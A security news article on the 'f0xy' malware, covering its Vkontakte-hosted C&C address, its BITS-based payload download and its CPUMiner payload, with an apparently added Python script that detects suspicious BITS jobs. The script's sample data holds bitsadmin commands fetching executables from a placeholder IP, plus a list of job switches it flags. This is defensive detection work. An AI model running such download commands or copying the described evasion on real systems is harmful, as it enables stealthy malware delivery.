
New “F0xy” Malware Uses Clever Techniques to Stay Hidden

New Malware Downloads Cryptocurrency Miner to Infected Devices

Researchers at Websense have come across a new piece of malware that leverages legitimate websites and services in an effort to disguise its malicious activities.

The threat has been dubbed “f0xy” not only because it is cunning like a fox, but also because this particular string appears in its executables and in the registry entries it creates for persistence.

The earliest samples identified by researchers are dated January 13, 2015, but the malware has been enhanced by its creators since. Initial variants only worked on Windows Vista and later versions of Microsoft’s operating system, but newer variants also work on Windows XP, Websense said.

The initial dropper was detected by only 5 of the antivirus engines on VirusTotal when it was analyzed by Websense. The detection rate has increased since, but it’s still fairly low.

According to researchers, the developers of f0xy chose not to obfuscate the malware’s code, most likely in an effort to make it look more legitimate and avoid raising suspicion.

Another method used to hide the presence of the threat involves the Russian social media website Vkontakte. The malware contains an encoded string that conceals a URL pointing to a specific Vkontakte profile. An encoded string posted as a comment on that profile contains the URL of the command and control (C&C) server used by the malware, so the C&C address can be changed without redeploying the malware.

Once the f0xy downloader finds itself on a computer, it leverages the Microsoft Background Intelligent Transfer Service (BITS) to download its payload. BITS is designed for transferring files between a client and a server using idle network bandwidth. The component is leveraged by services like Windows Defender and Windows Update.

“Presumably the main reason for using BITS is to prevent security products from flagging its behavior as suspicious, because anti-malware solutions are much less likely to have a problem with bitsadmin.exe performing network requests than an unknown executable,” Websense researcher Nick Griffin wrote in a blog post.

In this case, the malware calls the bitsadmin executable directly to specify the parameters for the file transfer (source and destination of the file). However, experts have pointed out that the transfer can be made even stealthier by interacting with BITS through the Component Object Model (COM) interface.
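The two BITS paths described above (a direct bitsadmin.exe call versus a job created through COM) leave different traces, and a defender needs a check for each. The Python below is an added example written for this page, not code from Websense or from the malware: it runs over constructed process-creation records shaped like Sysmon Event ID 1 fields (Image, CommandLine, ParentImage) and over constructed BITS-Client operational events (Event ID 59, which records a job start together with its URL). The host allow-list, the sample records and the IP address are assumptions for illustration only; the bitsadmin switches named are real switches of the tool.

```python
"""
Detection sketch for BITS-based payload staging (added example, not from the article).

Check 1 looks at bitsadmin.exe process creations that create or feed a job.
Check 2 looks at the BITS-Client operational log, which still records jobs
created through the COM interface even though no bitsadmin.exe process exists.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Set
from urllib.parse import urlparse

# bitsadmin switches that create or feed a transfer job (read-only switches such as /list are ignored)
JOB_SWITCHES = ("/transfer", "/create", "/addfile", "/resume")

# Assumed allow-list of hosts that legitimately appear in BITS jobs on a managed Windows host.
EXPECTED_HOSTS = {"download.windowsupdate.com", "definitionupdates.microsoft.com"}


@dataclass
class Finding:
    source: str    # "process" or "bits-client"
    reason: str
    evidence: str


def _hosts_in(text: str) -> Set[str]:
    """Extract the hostnames of every http(s) URL in a command line."""
    return {urlparse(u).hostname or "" for u in re.findall(r"https?://\S+", text, re.I)}


def check_process_event(image: str, command_line: str, parent_image: str) -> Optional[Finding]:
    """Flag a bitsadmin.exe job that pulls from a host outside the allow-list."""
    if not image.lower().endswith("\\bitsadmin.exe"):
        return None
    lowered = command_line.lower()
    if not any(switch in lowered for switch in JOB_SWITCHES):
        return None  # queries like /list or /info do not move files
    unexpected = _hosts_in(command_line) - EXPECTED_HOSTS
    if not unexpected:
        return None
    reason = f"bitsadmin job fetching from {sorted(unexpected)}; parent {parent_image}"
    return Finding("process", reason, command_line)


def check_bits_job_event(event_id: int, url: str, job_owner: str) -> Optional[Finding]:
    """Flag a BITS job start (Event ID 59) whose URL host is outside the allow-list.

    This catches COM-created jobs, which the process-creation check cannot see.
    """
    if event_id != 59:
        return None
    host = urlparse(url).hostname or ""
    if host in EXPECTED_HOSTS:
        return None
    return Finding("bits-client", f"BITS job to unexpected host {host} (owner {job_owner})", url)


# Constructed sample telemetry; the paths, job names and 198.51.100.23 are made up.
PROCESS_EVENTS = [
    ("C:\\Windows\\System32\\bitsadmin.exe",
     "bitsadmin.exe /transfer upd /download /priority normal "
     "http://download.windowsupdate.com/x.cab C:\\Windows\\Temp\\x.cab",
     "C:\\Windows\\System32\\cmd.exe"),
    ("C:\\Windows\\System32\\bitsadmin.exe",
     "bitsadmin.exe /transfer j1 http://198.51.100.23/m.exe C:\\Users\\Public\\m.exe",
     "C:\\Users\\user\\AppData\\Roaming\\dropper.exe"),
    ("C:\\Windows\\System32\\bitsadmin.exe",
     "bitsadmin.exe /addfile j2 http://198.51.100.23/p.dat C:\\Users\\Public\\p.dat",
     "C:\\Users\\user\\AppData\\Roaming\\dropper.exe"),
    ("C:\\Windows\\System32\\bitsadmin.exe", "bitsadmin.exe /list /allusers",
     "C:\\Windows\\System32\\cmd.exe"),
]
BITS_EVENTS = [
    (59, "http://download.windowsupdate.com/x.cab", "NT AUTHORITY\\SYSTEM"),
    (59, "http://198.51.100.23/m.exe", "HOST\\user"),   # COM-created job, no bitsadmin.exe
    (60, "http://198.51.100.23/m.exe", "HOST\\user"),   # job completion, not a start
]


def run_detections() -> List[Finding]:
    """Apply both checks to the sample telemetry and return every finding."""
    findings = [f for args in PROCESS_EVENTS if (f := check_process_event(*args))]
    findings += [f for args in BITS_EVENTS if (f := check_bits_job_event(*args))]
    return findings


if __name__ == "__main__":
    for finding in run_detections():
        print(f"[{finding.source}] {finding.reason}\n    {finding.evidence}")
```

On the sample data this yields three findings: the two dropper-spawned bitsadmin jobs and the COM-created job seen only in the BITS-Client log. The allow-list is the weak point of this approach; a first cut is to baseline the hosts BITS actually contacts in your environment before enforcing it.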

The payload spotted by Websense is a 64-bit version of CPUMiner, a popular open source cryptocurrency mining application. The attackers use the CoinMine.pw mining pool to ensure that all the virtual currency mined by the infected machines goes to them.

“It is clear that financial motivations remain at the forefront of cybercriminal minds, with the anonymity of cryptocurrency providing a somewhat safer route for collecting the spoils,” Griffin said. “We also expect to see a continuing growth of malware authors migrating to legitimate and reputable websites, to hide their malicious activities, and we expect plenty more evasion tactics adopted as authors continue to subvert security products.”

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.
